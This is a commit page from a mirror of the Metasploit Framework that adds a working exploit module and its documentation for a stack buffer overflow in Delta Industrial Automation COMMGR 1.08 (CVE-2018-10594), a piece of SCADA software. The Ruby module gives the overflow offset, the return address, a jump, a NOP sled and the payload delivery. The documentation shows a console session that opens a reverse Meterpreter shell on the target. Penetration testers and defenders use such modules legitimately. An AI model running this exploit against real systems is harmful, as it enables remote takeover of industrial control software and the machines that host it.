infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10672, Add COMMGR Buffer Overflow module

4.x
Shelby Pace 2018-10-08 10:04:52 -05:00 committed by Metasploit
parent 2c34813e6b
commit ec5530ece1
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 142 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

67
documentation/modules/exploit/windows/scada/delta_ia_commgr_bof.md Normal file
View File

@ -0,0 +1,67 @@
## Vulnerable Application
Delta Electronics Delta Industrial Automation COMMGR 1.08 is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code. This module has been tested successfully on Windows XP SP3, Windows 7 SP1, and Windows 8.1. The vulnerable application is available for download at http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=7763&DocPath=1&hl=en-US.
## Verification Steps
1. Install Delta Industrial Automation COMMGR 1.08
2. Start ```msfconsole```
3. Do ```use exploit/windows/scada/delta_ia_commgr_bof```
4. Do ```set RHOST <target_ip>```
5. Do ```run```
6. You should get a shell. :)
## Scenarios
### Delta Industrial Automation COMMGR 1.08 on Windows 7 SP1
```
msf > use exploit/windows/scada/delta_ia_commgr_bof
msf exploit(windows/scada/delta_ia_commgr_bof) > show options
Module options (exploit/windows/scada/delta_ia_commgr_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 502 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 COMMGR 1.08 / Windows Universal
msf exploit(windows/scada/delta_ia_commgr_bof) > set RHOST 192.168.3.64
RHOST => 192.168.3.64
msf exploit(windows/scada/delta_ia_commgr_bof) > run
[*] Started reverse TCP handler on 192.168.3.150:4444
[*] 192.168.3.64:502 - Trying target COMMGR 1.08 / Windows Universal, sending 4601 bytes...
[*] Sending stage (179779 bytes) to 192.168.3.64
[*] Meterpreter session 1 opened (192.168.3.150:4444 -> 192.168.3.64:49170) at 2018-09-18 23:38:51 -0700
meterpreter > sysinfo
Computer : TEST01
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > shell
Process 932 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Delta Industrial Automation\COMMGR 1.08>exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.3.64 - Meterpreter session 1 closed. Reason: User exit
msf exploit(windows/scada/delta_ia_commgr_bof) >
```

75
modules/exploits/windows/scada/delta_ia_commgr_bof.rb Normal file
View File

@ -0,0 +1,75 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'EDB', '44965'],
[ 'CVE', '2018-10594']
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end